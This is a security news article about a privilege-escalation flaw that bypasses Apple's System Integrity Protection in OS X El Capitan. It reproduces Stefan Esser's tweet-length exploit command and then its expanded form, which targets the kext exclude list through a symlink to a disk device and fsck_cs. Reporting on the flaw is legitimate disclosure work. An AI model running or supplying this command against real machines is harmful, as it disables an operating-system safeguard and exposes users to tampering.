The code to bypass Apple System Integrity Protection security mechanism fits in a Tweet

According to the experts at SentinelOne the flaw allows circumventing the SIP technology bypassing the key security feature without kernel exploits. Now Apple issued a security patch for both OS X El Capitan 10.11.4 and iOS 9.3, but it seems that the update is ineffective, causing the users’ disappointment.

The critical privilege escalation vulnerability in the System Integrity Protection still affects the most recent version of OS for both Macs and iThings.

The popular researcher Stefan Esser, has published a new exploit code to bypass latest patched version of the System Integrity Protection application, and the interesting part is the dimension of the code that fits in a Tweet.

You’ve heard it right, according to the Esser this isn’t the unique flaw affecting the SIP, and most of them are still unfixed.

“Stefan Esser of German security biz SektionEins also gave a talk at this year’s SyScan360 during which he highlighted a bunch of SIP-related vulnerabilities. Esser told The Register “everything in my slides is unfixed” by Apple in the latest version of OS X 10.11 except for two flaws: the kas_info syscall and a malicious mount.” reported El Reg.

“The evil mount worked by mounting a file system over /System and replacing supposedly SIP-protected core OS utilities with attacker-controlled ones (yes, that really worked). It was fixed in OS X 10.11.2. “

ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot

The above code expands to:

ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX

fsck_cs /dev/diskX 1>&-

touch /Library/Extensions/

Reboot

Let’s hope Apple would fix all the open SIP issues as soon as possible.

Pierluigi Paganini

Security Affairs –  (System Integrity Protection, SIP, hacking)